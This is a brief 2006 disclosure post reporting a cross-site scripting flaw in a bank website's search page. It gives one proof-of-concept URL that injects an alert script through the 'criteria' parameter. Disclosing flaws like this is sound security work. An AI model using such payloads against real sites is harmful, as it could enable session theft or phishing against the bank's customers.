Commerce Bank XSS Vulnerability ------------------------------- Author: Matthew Benenati Email: dk.mak0[at]gmail[dot]com Date: 9/19/2006 Commerce Bank's website is susceptible to cross site scripting. Example: http://www.commerceonline.com/search/commerce_vsearchresult.cfm?criteria=%22%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E